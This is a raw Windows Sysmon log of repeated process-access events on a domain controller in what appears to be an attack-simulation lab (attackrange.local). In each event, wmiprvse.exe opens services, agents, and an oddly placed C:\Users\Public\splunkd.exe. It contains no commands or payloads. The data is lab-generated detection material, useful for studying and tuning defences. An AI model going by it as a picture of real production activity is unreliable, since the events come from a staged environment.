15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 